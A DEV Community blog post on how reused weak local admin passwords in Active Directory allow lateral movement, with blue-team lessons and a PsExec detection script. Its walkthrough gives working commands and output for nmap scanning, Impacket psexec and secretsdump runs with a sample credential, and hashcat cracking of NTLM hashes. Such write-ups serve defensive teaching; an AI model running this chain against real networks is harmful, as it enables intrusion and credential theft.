DEV Community

itsmegsg
Devil Lies in the details - How not to join an AD!

🛠️ How a Weak Local Administrator Configuration in AD Can Lead to Lateral Movement

In many Active Directory (AD) environments, PCs are domain-joined by staff with limited cybersecurity training. This often leads to dangerous misconfigurations that attackers can exploit to gain a foothold and move laterally.


🔍 Real-World Scenario

In a recent observation, I found an organization where PCs were added to the domain using the following steps:

  1. A local admin account was created:

    • Username: Administrator
    • Password: P@ssw0rd123 (very weak and reused)
  2. Using this Administrator account, a normal user account was created for workstation use:

    • Example: Manager_HR
  3. The domain was joined from the normal user account.


🚨 What This Means

  • Every PC has a predictable local admin account (Administrator) with a weak, reused password.
  • SMB and file sharing are enabled on some machines.
  • No use of LAPS or GPO to randomize local admin credentials.

This makes it trivial for an attacker to pivot across the network if one machine is compromised.


⚔️ Attacker Prerequisites

The attacker:

  • Is on the same internal network (Kali machine or a rogue device)
  • Can enumerate Windows hosts via SMB or ping sweeps
  • Finds open SMB ports (445) on several machines

🔥 Attack Walkthrough

✅ 1. Nmap Scan from Attacker Machine

A simple scan using Nmap reveals multiple Windows hosts with port 445 open:

nmap -p 445 --open -T4 192.168.0.0/24

Result:

Host: 192.168.0.151
PORT    STATE SERVICE
445/tcp open  microsoft-ds

✅ 2. PsExec via Impacket from Kali

If the attacker knows the reused local admin credentials (Administrator:P@ssw0rd123), they can run:

python3 /usr/share/doc/python3-impacket/examples/psexec.py '.\Administrator:P@ssw0rd123@192.168.0.151'

Result:

[*] Found writable share ADMIN$
[*] Starting service...
C:\Windows\system32>

🎉 Boom — SYSTEM shell on a domain-joined Windows 10 machine!


✅ 3. System & Domain Enumeration

Once in, the attacker can enumerate:

whoami /all
ipconfig /all
systeminfo
net config workstation
net user /domain
net group "Domain Admins" /domain

This gives the attacker:

  • System privileges
  • Domain name
  • Domain controller info
  • Active user accounts and groups


✅ 4. Dumping Hashes with secretsdump.py

From Kali, the attacker runs:

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py 'Administrator:P@ssw0rd123@192.168.0.151'

Result:

[*] Dumping local SAM hashes
User1:1000:aad3...:6597d9fe8469e21d840e2cbff8d43c8b:::
...
[*] Dumping LSA Secrets
[*] Dumping cached domain logon information

✅ 5. Cracking Passwords with Hashcat

The NTLM hash 6597d9fe8469e21d840e2cbff8d43c8b is cracked using:

hashcat -m 1000 -a 0 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt --force

Result:

6597d9fe8469e21d840e2cbff8d43c8b:Test@1234

💀 You now have plaintext credentials of a local user. If reused, you can pivot to other machines or escalate to domain admin with additional paths.


🔒 Lesson for Blue Teams

  1. Never reuse local admin passwords — deploy LAPS.
  2. Enforce complex passwords and disable the SID-500 account.
  3. Block SMB admin shares over the network if not required.
  4. Monitor for PsExec-style behavior (network logons with local accounts, ADMIN$ share access, unexpected service installs) and other lateral movement.
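One way to implement the monitoring in point 4, as an added example that is not part of the original post: the script correlates three kinds of Windows events that the walkthrough's psexec.py session leaves behind (a network logon with a local account, ADMIN$ share access, and a new service installed) per source IP within a short window. The line format, the hostname HR-PC01, the IPs and the service name are constructed assumptions, not real log exports.

```python
"""Toy detector for PsExec-style lateral movement in Windows Security/System events.

Correlates, per source IP and within a short window:
  4624  network (type 3) logon with a *local* account (domain == computer name)
  5140  network share access to ADMIN$
  7045  a new service installed (the psexec.py flow uploads a binary to the
        writable ADMIN$ share and starts it as a service)
Event records are constructed samples in a simplified 'ts|id|k=v|...' form.
"""
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)
COMPUTER = "HR-PC01"  # constructed hostname; local accounts log on with it as their domain

def parse(line):
    """Parse 'ts|event_id|key=value|...' into a dict (constructed line format)."""
    ts, eid, *fields = line.split("|")
    rec = dict(f.split("=", 1) for f in fields)
    rec["ts"] = datetime.fromisoformat(ts)
    rec["id"] = int(eid)
    return rec

def detect_psexec(lines, computer=COMPUTER, window=WINDOW):
    """Return (source_ip, account, service) triples that look like PsExec-style use."""
    recs = sorted((parse(l) for l in lines), key=lambda r: r["ts"])
    hits = []
    for logon in (r for r in recs if r["id"] == 4624 and r.get("type") == "3"
                  and r.get("domain", "").upper() == computer.upper()):
        ip, end = logon["ip"], logon["ts"] + window
        later = [r for r in recs if logon["ts"] <= r["ts"] <= end]
        share = any(r["id"] == 5140 and r.get("share", "").upper().endswith("ADMIN$")
                    and r.get("ip") == ip for r in later)
        services = [r["service"] for r in later if r["id"] == 7045]
        if share and services:
            hits.append((ip, logon["user"], services[0]))
    return hits

SAMPLE_EVENTS = [  # constructed events, not taken from the post's lab
    "2024-05-01T10:00:00|4624|type=3|user=Administrator|domain=HR-PC01|ip=192.168.0.77",
    "2024-05-01T10:00:01|5140|share=\\\\*\\ADMIN$|ip=192.168.0.77",
    "2024-05-01T10:00:02|7045|service=bTqKwzPd|path=%SystemRoot%\\bTqKwzPd.exe",
    "2024-05-01T11:30:00|4624|type=3|user=jsmith|domain=CORP|ip=192.168.0.10",  # benign domain user
    "2024-05-01T11:30:05|5140|share=\\\\*\\Shared|ip=192.168.0.10",
]

if __name__ == "__main__":
    for ip, user, svc in detect_psexec(SAMPLE_EVENTS):
        print(f"ALERT psexec-style lateral movement from {ip}: local {user!r} logon, ADMIN$ access, service {svc}")
```

A local-account network logon alone is noisy; requiring the ADMIN$ access and service install in the same window is what keeps the alert tied to the remote-execution pattern shown in the walkthrough.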

🧠 Final Thought

One bad configuration — like a reused local admin password — can unravel your entire domain. Start with the basics. Secure the endpoints, then build upward.
